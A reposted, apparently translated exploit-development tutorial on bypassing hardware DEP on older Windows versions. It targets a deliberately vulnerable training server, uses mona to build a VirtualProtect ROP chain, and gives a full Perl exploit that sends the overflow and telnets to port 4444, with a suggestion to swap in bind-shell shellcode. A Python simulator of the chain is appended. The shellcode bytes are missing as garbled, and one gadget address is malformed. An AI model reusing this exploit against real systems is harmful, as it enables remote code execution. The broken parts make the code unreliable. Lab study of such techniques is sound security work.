A learning experience bypassing DEP (Hardware DEP)

Source: Internet
Author: User

A simple remote stack buffer overflow experiment (3): what is bypassing DEP?

Data Execution Prevention (DEP) is a set of hardware and software technologies that perform additional checks on memory to help prevent malicious code from running on the system. In Microsoft Windows XP Service Pack 2, Microsoft Windows Server 2003 Service Pack 1, Microsoft Windows XP Tablet PC Edition 2005, Microsoft Windows Vista, and Microsoft Windows 7, DEP is enforced by both hardware and software.

DEP classification:
- Hardware DEP: requires both CPU and operating-system support.
- Software DEP: in practice, SafeSEH.

DEP bypass approaches, by API and platform:

API                      XP SP2   XP SP3   Vista SP0   Vista SP1   Win7     Win2003 SP1   Win2008
VirtualAlloc             yes      yes      yes         yes         yes      yes           yes
HeapCreate               yes      yes      yes         yes         yes      yes           yes
SetProcessDEPPolicy      no (1)   yes      no (1)      yes         no (2)   no (1)        yes
NtSetInformationProcess  yes      yes      yes         no (2)      no (2)   yes           no (2)
VirtualProtect           yes      yes      yes         yes         yes      yes           yes
WriteProcessMemory       yes      yes      yes         yes         yes      yes           yes

Regarding usability in exploits: obviously VirtualAlloc(), HeapCreate(), VirtualProtect() and WriteProcessMemory() are the ones most commonly used. However, when building the ROP chain we sometimes have to hard-code addresses into the gadgets, which costs the chain its generality. Corelan Team uses static addresses in certain DLLs to work out generic ROP chains. I have to say that I like this team very much, because all my knowledge comes from the articles they published. If you are confused or cannot solve a problem, you can raise it in their forum and they will give you constructive suggestions. For the generic ROP chains, see: https://www.corelan.be/index.php/security/corelan-ropdb/

Let's do a simple experiment.

Debugging tool: Immunity Debugger (download from the Canvas homepage, you know).
Required plug-in: mona (v2 is already out; it is from Corelan, so search for Corelan Team).
Vulnerable program: http://code.securitytube.net/Server-Strcpy.exe (the program listens on port 10000).
PS: make sure DEP is enabled (this may require a restart).

You can use any programming language you like to write this exploit.
Here I chose Perl. Let's take a look at the general structure of the exploit:

```perl
# exploit.pl
use IO::Socket;

if (!($ARGV[1])) {
    print "Usage: perl $0 <Host> <Port>\n";
    exit;
}

$buf = "pattern";

$socket = IO::Socket::INET->new(
    PeerAddr => $ARGV[0],
    PeerPort => $ARGV[1],
    Proto    => 'tcp',
) or die "Create socket fail!\n";

print "Exploit......\n";
if (send($socket, $buf, 0) == length($buf)) {   # check that all of $buf was sent
    print "Send Successful!\n";
    print "Connect to port 4444......\n";
    system("telnet $ARGV[0] 4444");              # remote login
} else {
    print "Send Fail!\n";
    exit;
}
close $socket;
```

Brief steps:

1. First determine the size of the junk code. We can use mona to generate a 1000-byte pattern like this: `!mona pattern_create 1000`, which creates a pattern.txt file in the working directory of Immunity Debugger. Assign the pattern to $buf. Then open server-strcpy.exe in Immunity Debugger and send the pattern through exploit.pl, like this: `exploit.pl 127.0.0.1 10000`. Next let mona compute the offset in Immunity Debugger, like this: `!mona pattern_offset 0x12345678` (the value now in EIP), which returns an offset of 268. So our junk code should be `$buf = "\x41" x 268;`, followed on the next lines by `$buf .= "\x42" x 4;` and `$buf .= "1abcdefghijk";`. If it works, EIP becomes 42424242 and ESP points at the start of 1abcdefghijk. Make sure everything works before going on.

Next we build our ROP chain. We only need mona to do all of this for us: open server-strcpy.exe in Immunity Debugger and enter the command `!mona rop -m *.dll -cp nonull`. It takes about 5 minutes to construct the ROP chain for you, so listen to a song and rest. When it is done, go to the root directory of Immunity Debugger and open rop_chains.txt. It provides many options, and the code is written out for us in Python, JS and Ruby.
We select the VirtualProtect() chain. The Python code provided by mona looks roughly like this:

```python
import struct

def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = ""
    rop_gadgets += struct.pack('<L', 0x77c22217)  # pop eax # RETN [msvcrt.dll]
    rop_gadgets += struct.pack('<L', 0x77be1120)  # ptr to &VirtualProtect() [IAT msvcrt.dll]
    rop_gadgets += struct.pack('<L', 0x77e62cf4)  # mov eax, dword ptr ds:[eax] # RETN [RPCRT4.dll]
    rop_gadgets += struct.pack('<L', 0x77eac3bc)  # xchg eax, esi # RETN [RPCRT4.dll]
    rop_gadgets += struct.pack('<L', 0x77c16163)  # pop ebp # RETN [msvcrt.dll]
    rop_gadgets += struct.pack('<L', 0x77debe1b)  # & jmp esp [ADVAPI32.dll]
    rop_gadgets += struct.pack('<L', 0x77e8253d)  # pop eax # RETN [RPCRT4.dll]
    rop_gadgets += struct.pack('<L', 0xfffffdff)  # value to negate, will become 0x00000201
    rop_gadgets += struct.pack('<L', 0x77e6b47c)  # neg eax # RETN [RPCRT4.dll]
    rop_gadgets += struct.pack('<L', 0x77dc563a)  # xchg eax, ebx # RETN [ADVAPI32.dll]
    rop_gadgets += struct.pack('<L', 0x7c87f325)  # pop eax # RETN [kernel32.dll]
    rop_gadgets += struct.pack('<L', 0xffffffc0)  # value to negate, will become 0x00000040
    rop_gadgets += struct.pack('<L', 0x77da9f8)   # neg eax # RETN [ADVAPI32.dll] (address as printed in the original)
    rop_gadgets += struct.pack('<L', 0x7c95208f)  # xchg eax, edx # RETN [ntdll.dll]
    rop_gadgets += struct.pack('<L', 0x77c0f009)  # pop ecx # RETN [msvcrt.dll]
    rop_gadgets += struct.pack('<L', 0x71a15119)  # &writable location [WS2HELP.dll]
    rop_gadgets += struct.pack('<L', 0x77e58608)  # pop edi # RETN [RPCRT4.dll]
    rop_gadgets += struct.pack('<L', 0x77e6bf1c)  # RETN (rop nop) [RPCRT4.dll]
    rop_gadgets += struct.pack('<L', 0x77df5c1f)  # pop eax # RETN [ADVAPI32.dll]
    rop_gadgets += struct.pack('<L', 0x90909090)  # nop
    rop_gadgets += struct.pack('<L', 0x77e7edb2)  # PUSHAD # RETN [RPCRT4.dll]
    return rop_gadgets

rop_chain = create_rop_chain()
```

Converted to Perl:

```perl
$buf .= pack('V', 0x77c22217);  # pop eax # RETN [msvcrt.dll]
$buf .= pack('V', 0x77be1120);  # ptr to &VirtualProtect() [IAT msvcrt.dll]
$buf .= pack('V', 0x77e62cf4);  # mov eax, dword ptr ds:[eax] # RETN [RPCRT4.dll]
$buf .= pack('V', 0x77eac3bc);  # xchg eax, esi # RETN [RPCRT4.dll]
$buf .= pack('V', 0x77c16163);  # pop ebp # RETN [msvcrt.dll]
$buf .= pack('V', 0x77debe1b);  # & jmp esp [ADVAPI32.dll]
$buf .= pack('V', 0x77e8253d);  # pop eax # RETN [RPCRT4.dll]
$buf .= pack('V', 0xfffffdff);  # value to negate, will become 0x00000201
$buf .= pack('V', 0x77e6b47c);  # neg eax # RETN [RPCRT4.dll]
$buf .= pack('V', 0x77dc563a);  # xchg eax, ebx # RETN [ADVAPI32.dll]
$buf .= pack('V', 0x7c87f325);  # pop eax # RETN [kernel32.dll]
$buf .= pack('V', 0xffffffc0);  # value to negate, will become 0x00000040
$buf .= pack('V', 0x77da9f8);   # neg eax # RETN [ADVAPI32.dll] (address as printed in the original)
$buf .= pack('V', 0x7c95208f);  # xchg eax, edx # RETN [ntdll.dll]
$buf .= pack('V', 0x77c0f009);  # pop ecx # RETN [msvcrt.dll]
$buf .= pack('V', 0x71a15119);  # &writable location [WS2HELP.dll]
$buf .= pack('V', 0x77e58608);  # pop edi # RETN [RPCRT4.dll]
$buf .= pack('V', 0x77e6bf1c);  # RETN (rop nop) [RPCRT4.dll]
$buf .= pack('V', 0x77df5c1f);  # pop eax # RETN [ADVAPI32.dll]
$buf .= pack('V', 0x90909090);  # nop
$buf .= pack('V', 0x77e7edb2);  # PUSHAD # RETN [RPCRT4.dll]
```

If our original layout was junkcode + EIP + shellcode, it should now look like this: junkcode + ROP chain + shellcode. Next we need a shellcode; of course, you can let Metasploit generate one for you. The original post embeds a calc.exe payload as `my $shellcode = "\xdb\xc0\x31\xc9..."`, but several of its escape sequences are garbled in this copy, so the bytes are not reproduced here.

Putting all the pieces together gives our final exploit:

```perl
use IO::Socket;

if (!($ARGV[1])) {
    print "Usage: perl $0 <Host> <Port>\n";
    exit;
}

# The calc.exe shellcode from the original post belongs here; its bytes are
# garbled in this copy of the article, so it is left empty.
my $shellcode = "";

$buf  = "\x41" x 268;           # junk code up to the saved return address
$buf .= pack('V', 0x77c22217);  # pop eax # RETN [msvcrt.dll]
$buf .= pack('V', 0x77be1120);  # ptr to &VirtualProtect() [IAT msvcrt.dll]
$buf .= pack('V', 0x77e62cf4);  # mov eax, dword ptr ds:[eax] # RETN [RPCRT4.dll]
$buf .= pack('V', 0x77eac3bc);  # xchg eax, esi # RETN [RPCRT4.dll]
$buf .= pack('V', 0x77c16163);  # pop ebp # RETN [msvcrt.dll]
$buf .= pack('V', 0x77debe1b);  # & jmp esp [ADVAPI32.dll]
$buf .= pack('V', 0x77e8253d);  # pop eax # RETN [RPCRT4.dll]
$buf .= pack('V', 0xfffffdff);  # value to negate, will become 0x00000201
$buf .= pack('V', 0x77e6b47c);  # neg eax # RETN [RPCRT4.dll]
$buf .= pack('V', 0x77dc563a);  # xchg eax, ebx # RETN [ADVAPI32.dll]
$buf .= pack('V', 0x7c87f325);  # pop eax # RETN [kernel32.dll]
$buf .= pack('V', 0xffffffc0);  # value to negate, will become 0x00000040
$buf .= pack('V', 0x77da9f8);   # neg eax # RETN [ADVAPI32.dll] (address as printed in the original)
$buf .= pack('V', 0x7c95208f);  # xchg eax, edx # RETN [ntdll.dll]
$buf .= pack('V', 0x77c0f009);  # pop ecx # RETN [msvcrt.dll]
$buf .= pack('V', 0x71a15119);  # &writable location [WS2HELP.dll]
$buf .= pack('V', 0x77e58608);  # pop edi # RETN [RPCRT4.dll]
$buf .= pack('V', 0x77e6bf1c);  # RETN (rop nop) [RPCRT4.dll]
$buf .= pack('V', 0x77df5c1f);  # pop eax # RETN [ADVAPI32.dll]
$buf .= pack('V', 0x90909090);  # nop
$buf .= pack('V', 0x77e7edb2);  # PUSHAD # RETN [RPCRT4.dll]
$buf .= $shellcode;             # shellcode follows the chain directly

$socket = IO::Socket::INET->new(
    PeerAddr => $ARGV[0],
    PeerPort => $ARGV[1],
    Proto    => 'tcp',
) or die "Create socket fail!\n";

print "Exploit......\n";
if (send($socket, $buf, 0) == length($buf)) {   # check that all of $buf was sent
    print "Send Successful!\n";
    print "Connect to port 4444......\n";
    system("telnet $ARGV[0] 4444");              # remote login
} else {
    print "Send Fail!\n";
    exit;
}
close $socket;
```

Now, if you are lucky, you will see your calc pop up. Although this is just a simple example, I think everything has to begin with something simple. If you replace the shellcode with a bind-shell shellcode, you should get a shell at this point. For more information, see.
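To see what the VirtualProtect chain above actually does before trusting mona's output, here is an added Python model (not code from the original post or from mona) that applies each gadget's documented effect to the chain's dwords and reports the register state and the frame PUSHAD leaves on the stack; the stack base 0x0012ff40 and the VirtualProtect address 0x7c801ad4 read through the IAT slot are assumed placeholders. It also applies mona's nonull criterion to every dword.

```python
# The mona VirtualProtect chain from the article, as (dword, gadget) pairs; the
# gadget names come from mona's comments and "data" marks a value a pop consumes.
CHAIN = [
    (0x77c22217, "pop eax"),       (0x77be1120, "data"),
    (0x77e62cf4, "mov eax,[eax]"), (0x77eac3bc, "xchg eax,esi"),
    (0x77c16163, "pop ebp"),       (0x77debe1b, "data"),
    (0x77e8253d, "pop eax"),       (0xfffffdff, "data"),
    (0x77e6b47c, "neg eax"),       (0x77dc563a, "xchg eax,ebx"),
    (0x7c87f325, "pop eax"),       (0xffffffc0, "data"),
    (0x77da9f8,  "neg eax"),       (0x7c95208f, "xchg eax,edx"),
    (0x77c0f009, "pop ecx"),       (0x71a15119, "data"),
    (0x77e58608, "pop edi"),       (0x77e6bf1c, "data"),
    (0x77df5c1f, "pop eax"),       (0x90909090, "data"),
    (0x77e7edb2, "pushad"),
]
# Assumed placeholders, not from the article: what the IAT slot 0x77be1120
# holds (VirtualProtect's address) and where the chain sits on the stack.
MEM = {0x77be1120: 0x7c801ad4}
STACK_BASE = 0x0012ff40

def null_free(chain):
    # mona's "-cp nonull" criterion: no zero byte in any little-endian dword
    return all(0 not in v.to_bytes(4, "little") for v, _ in chain)

def run_chain(chain, esp=STACK_BASE):
    # Apply each gadget's documented effect; return registers and the PUSHAD frame.
    regs = dict(eax=0, ebx=0, ecx=0, edx=0, esi=0, edi=0, ebp=0)
    i = 0
    while i < len(chain):
        gadget = chain[i][1]
        i, esp = i + 1, esp + 4                  # RETN consumed this dword
        if gadget.startswith("pop "):
            regs[gadget[4:]] = chain[i][0]       # pop takes the next dword
            i, esp = i + 1, esp + 4
        elif gadget == "mov eax,[eax]":
            regs["eax"] = MEM[regs["eax"]]       # dereference the IAT entry
        elif gadget.startswith("xchg eax,"):
            r = gadget[9:]
            regs["eax"], regs[r] = regs[r], regs["eax"]
        elif gadget == "neg eax":
            regs["eax"] = -regs["eax"] & 0xffffffff   # 0xfffffdff -> 0x201
        elif gadget == "pushad":
            # PUSHAD pushes EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI, so afterwards ESP
            # points at EDI; list the frame from low to high address.
            order = ("edi", "esi", "ebp", "esp", "ebx", "edx", "ecx", "eax")
            frame = [esp if r == "esp" else regs[r] for r in order]
            return regs, frame
    return regs, None
```

The returned frame reads, from ESP upward, as the RETN target (rop nop), VirtualProtect, its return address (jmp esp), lpAddress (the ESP value right after the 84-byte chain), dwSize 0x201, flNewProtect 0x40, lpflOldProtect and the nop that jmp esp lands on, which is why the shellcode must follow the chain immediately.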
